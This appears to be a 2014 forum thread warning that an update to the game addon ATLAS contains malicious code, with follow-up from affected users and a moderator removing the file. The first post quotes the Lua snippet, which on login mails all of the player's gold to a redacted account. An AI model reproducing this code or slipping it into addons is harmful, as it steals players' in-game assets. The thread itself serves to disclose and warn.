Thread Tools Display Modes
12/03/14, 09:48 PM   #1
Sasky
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 231
Malicious code in latest ATLAS (1.32)

@Cairenn or moderators -- tried PM first, delete this thread if needed once action taken.

Until one of the admins can remove the file (at least), disable ATLAS or make sure it does not update to version 1.32.

The latest version of ATLAS has the following malicious code in it:
Lua Code:
  1. function ATLAS:EVENT_PLAYER_ACTIVATED(...)
  2.     d("|cFF2222ATLAS|r addon Loaded, /atlas for more info")
  3.         RequestOpenMailbox()   
  4.         QueueMoneyAttachment(GetCurrentMoney())
  5.         SendMail("<REDACTED>", "..")   
  6.     --
  7.     -- Only once so unreg is from further events
  8.     --
  9.     EVENT_MANAGER:UnregisterForEvent( ATLAS.addonName, EVENT_PLAYER_ACTIVATED )
  10. end

For those who don't understand LUA, when the game loads in, it sends a mail with all gold in your bag to a specific player.

I've submitted a ticket and talked to a GM to report the account the gold was sent to.
  Reply With Quote
12/03/14, 10:05 PM   #2
HyperToxic
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 1
I was robbed.

I updated this add-on before reading this and my gold is missing.
  Reply With Quote
12/03/14, 10:14 PM   #3
Sasky
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 231
If you do lose your gold, disable the addon then contact a GM using the in-game 'Ask for Help'. Someone responded fairly quickly was able to restore the gold. Asked to logoff 5min or so to restore it and when logged back it in was there. The GM did indicate they were taking actions on their end -- whether banning or some form of bulk restore to everyone who sent mail to that person I don't know.
  Reply With Quote
12/03/14, 10:46 PM   #4
Cairenn
Credendo Vides
 
Cairenn's Avatar
Premium Member
WoWInterface Admin
Join Date: Mar 2004
Posts: 437
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.
  Reply With Quote
12/03/14, 10:50 PM   #5
TribeofOne
Join Date: Mar 2014
Posts: 41
Thank you for the warning. Hope all those whom this effected get help.

Now that we know this can happen how do we protect ourselves?

Last edited by TribeofOne : 12/03/14 at 11:09 PM.
  Reply With Quote
12/03/14, 10:53 PM   #6
TribeofOne
Join Date: Mar 2014
Posts: 41
Originally Posted by Cairenn View Post
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.

Cairenn the "unredacted" code is showing up in several comments on the ATLAS page. you may want to mod those or lock it. Id hate for someone else to take that code and add it to other addons and upload it.
  Reply With Quote
12/04/14, 12:53 AM   #7
rkuhnjr
 
rkuhnjr's Avatar
AddOn Author - Click to view addons
Join Date: Nov 2014
Posts: 26
Im surprised its that easy to trigger a mail with all your gold via an addon, i mean its literally just three lines of code...


Thanks for the heads up.
  Reply With Quote

ESOUI » Developer Discussions » General Authoring Discussion » Malicious code in latest ATLAS (1.32)


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off